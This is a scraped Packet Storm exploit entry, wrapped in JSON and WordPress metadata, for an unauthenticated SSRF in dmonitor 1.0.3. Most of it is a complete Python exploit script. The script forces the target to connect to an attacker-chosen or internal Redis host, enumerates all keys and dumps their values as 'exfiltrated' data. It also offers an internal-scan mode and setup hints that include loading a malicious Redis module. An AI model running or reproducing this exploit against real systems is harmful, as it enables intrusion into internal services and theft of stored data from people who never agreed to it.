{“lastseen”:”2026-06-01T18:14:59″,”description”:”Proof of concept demonstration exploit for dmonitor version 1.0.3 that leverages an unauthenticated server-side request forgery vulnerability to demonstrate redis access and data enumeration…”,”published”:”2026-06-01T00:00:00″,”modified”:”2026-06-01T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dmonitor 1.0.3 Server-Side Request Forgery \/ Redis Enumeration”,”source”:””,”references”:””,”id”:”PACKETSTORM:222360″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : dmonitor v1.0.3 \u2013 Unauthenticated SSRF Leading to Redis Access and Data Enumeration |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/github.com\/dhjz\/dmonitor |\\n ==================================================================================================================================\\n \\n [+] Summary : This Python script demonstrates a security vulnerability in dmonitor where unauthenticated requests can influence the application’s outbound connections. \\n The tool interacts with Redis-related API endpoints to assess whether the application can be induced to connect to arbitrary Redis servers specified by a user.\\n \\t\\t\\t\\t \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import json\\n import sys\\n import argparse\\n from urllib.parse import urljoin\\n \\n class DMonitorSSRF:\\n def __init__(self, target_url):\\n self.target_url = target_url.rstrip(‘\/’)\\n self.session = requests.Session()\\n self.redis_connected = False\\n \\n def init_redis(self, attacker_host, attacker_port=6379, password=\\”\\”):\\n \\”\\”\\”\\n Forces dmonitor to connect to attacker-controlled Redis server\\n \\”\\”\\”\\n endpoint = \\”\/monitor-api\/redis\/initRedis\\”\\n params = {\\n \\”host\\”: attacker_host,\\n \\”port\\”: attacker_port,\\n \\”password\\”: password\\n }\\n \\n print(f\\”[*] Forcing dmonitor to connect to Redis at {attacker_host}:{attacker_port}\\”)\\n \\n try:\\n response = self.session.get(\\n urljoin(self.target_url, endpoint),\\n params=params,\\n timeout=10\\n )\\n \\n if response.status_code == 200:\\n data = response.json()\\n if data.get(\\”code\\”) == 200:\\n print(\\”[+] Successfully connected to attacker’s Redis server\\”)\\n self.redis_connected = True\\n return True\\n else:\\n print(f\\”[-] Failed: {data.get(‘msg’)}\\”)\\n return False\\n else:\\n print(f\\”[-] HTTP {response.status_code}\\”)\\n return False\\n \\n except requests.exceptions.RequestException as e:\\n print(f\\”[-] Connection error: {e}\\”)\\n return False\\n \\n def list_keys(self, keyword=\\”\\”):\\n \\”\\”\\”\\n Lists all keys from the connected Redis server\\n \\”\\”\\”\\n if not self.redis_connected:\\n print(\\”[-] Redis not initialized. Call init_redis() first\\”)\\n return None\\n \\n endpoint = \\”\/monitor-api\/redis\/listKey\\”\\n params = {\\”keyword\\”: keyword}\\n \\n print(f\\”[*] Enumerating Redis keys (keyword: ‘{keyword}’)\\”)\\n \\n try:\\n response = self.session.get(\\n urljoin(self.target_url, endpoint),\\n params=params,\\n timeout=10\\n )\\n \\n if response.status_code == 200:\\n data = response.json()\\n if data.get(\\”code\\”) == 200:\\n keys = data.get(\\”data\\”, [])\\n print(f\\”[+] Found {len(keys)} key(s): {keys}\\”)\\n return keys\\n else:\\n print(f\\”[-] Failed: {data.get(‘msg’)}\\”)\\n return None\\n else:\\n print(f\\”[-] HTTP {response.status_code}\\”)\\n return None\\n \\n except requests.exceptions.RequestException as e:\\n print(f\\”[-] Connection error: {e}\\”)\\n return None\\n \\n def get_key_value(self, key):\\n \\”\\”\\”\\n Retrieves the value of a specific key from Redis\\n \\”\\”\\”\\n if not self.redis_connected:\\n print(\\”[-] Redis not initialized. Call init_redis() first\\”)\\n return None\\n \\n endpoint = \\”\/monitor-api\/redis\/getByKey\\”\\n params = {\\”key\\”: key}\\n \\n print(f\\”[*] Retrieving value for key: ‘{key}’\\”)\\n \\n try:\\n response = self.session.get(\\n urljoin(self.target_url, endpoint),\\n params=params,\\n timeout=10\\n )\\n \\n if response.status_code == 200:\\n data = response.json()\\n if data.get(\\”code\\”) == 200:\\n value = data.get(\\”data\\”, {}).get(\\”value\\”)\\n print(f\\”[+] Value: {value}\\”)\\n return value\\n else:\\n print(f\\”[-] Failed: {data.get(‘msg’)}\\”)\\n return None\\n else:\\n print(f\\”[-] HTTP {response.status_code}\\”)\\n return None\\n \\n except requests.exceptions.RequestException as e:\\n print(f\\”[-] Connection error: {e}\\”)\\n return None\\n \\n def full_exploit(self, attacker_host, attacker_port=6379):\\n \\”\\”\\”\\n Complete exploit chain\\n \\”\\”\\”\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”dmonitor v1.0.3 – Unauthenticated SSRF Exploit\\”)\\n print(\\”=\\”*60 + \\”\\\\n\\”)\\n if not self.init_redis(attacker_host, attacker_port):\\n print(\\”[-] Exploit failed at initialization stage\\”)\\n return False\\n keys = self.list_keys()\\n if not keys:\\n print(\\”[-] No keys found or enumeration failed\\”)\\n return False\\n print(\\”\\\\n[*] Exfiltrating data:\\”)\\n print(\\”-\\” * 40)\\n for key in keys:\\n value = self.get_key_value(key)\\n if value:\\n print(f\\” {key} =\\u003e {value}\\”)\\n \\n print(\\”\\\\n[+] Exploit completed successfully!\\”)\\n return True\\n \\n def internal_scan(self, target_host, target_port, redis_command=\\”\\”):\\n \\”\\”\\”\\n SSRF to internal Redis servers\\n \\”\\”\\”\\n print(f\\”[*] Attempting to connect to internal Redis: {target_host}:{target_port}\\”)\\n \\n if self.init_redis(target_host, target_port):\\n print(\\”[+] Successfully connected to internal Redis server\\”)\\n return self.list_keys()\\n return None\\n \\n def setup_attacker_redis():\\n \\”\\”\\”\\n Instructions for setting up attacker’s Redis server\\n \\”\\”\\”\\n print(\\”\\\\n[!] Attacker Redis Server Setup:\\”)\\n print(\\” # Install Redis if not already installed\\”)\\n print(\\” $ sudo apt install redis-server # Debian\/Ubuntu\\”)\\n print(\\” $ brew install redis # macOS\\”)\\n print(\\” # Or download from https:\/\/redis.io\/download\\”)\\n print(\\”\\\\n # Start Redis server\\”)\\n print(\\” $ redis-server –port 6379\\”)\\n print(\\”\\\\n # Set test data\\”)\\n print(\\” $ redis-cli set test_key \\\\\\”SSRF_CONFIRMED\\\\\\”\\”)\\n print(\\” $ redis-cli set sensitive_data \\\\\\”SECRET_VALUE\\\\\\”\\”)\\n print(\\”\\\\n # For advanced exploitation, set up malicious Redis module\\”)\\n print(\\” $ redis-cli MODULE LOAD \/path\/to\/malicious.so\\”)\\n print(\\”-\\” * 60)\\n \\n def main():\\n parser = argparse.ArgumentParser(description=’dmonitor v1.0.3 SSRF Exploit’)\\n parser.add_argument(‘-t’, ‘–target’, required=True, \\n help=’Target dmonitor URL (e.g., http:\/\/192.168.1.102:40001)’)\\n parser.add_argument(‘-a’, ‘–attacker-host’, required=True,\\n help=’Attacker-controlled Redis server IP’)\\n parser.add_argument(‘-p’, ‘–attacker-port’, default=6379, type=int,\\n help=’Attacker Redis port (default: 6379)’)\\n parser.add_argument(‘-i’, ‘–internal-scan’, nargs=2, metavar=(‘HOST’, ‘PORT’),\\n help=’Scan internal Redis server (SSRF to internal)’)\\n parser.add_argument(‘–password’, default=”,\\n help=’Redis password if required’)\\n \\n args = parser.parse_args()\\n if len(sys.argv) == 1:\\n parser.print_help()\\n setup_attacker_redis()\\n sys.exit(1)\\n \\n exploit = DMonitorSSRF(args.target)\\n if args.internal_scan:\\n internal_host, internal_port = args.internal_scan\\n exploit.internal_scan(internal_host, int(internal_port))\\n else:\\n exploit.full_exploit(args.attacker_host, args.attacker_port)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/222360″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222360\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-01T18:14:59″,”description”:”Proof of concept demonstration exploit for dmonitor version 1.0.3 that leverages an unauthenticated server-side request forgery vulnerability to demonstrate redis access and data enumeration…”,”published”:”2026-06-01T00:00:00″,”modified”:”2026-06-01T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dmonitor…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-58924","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n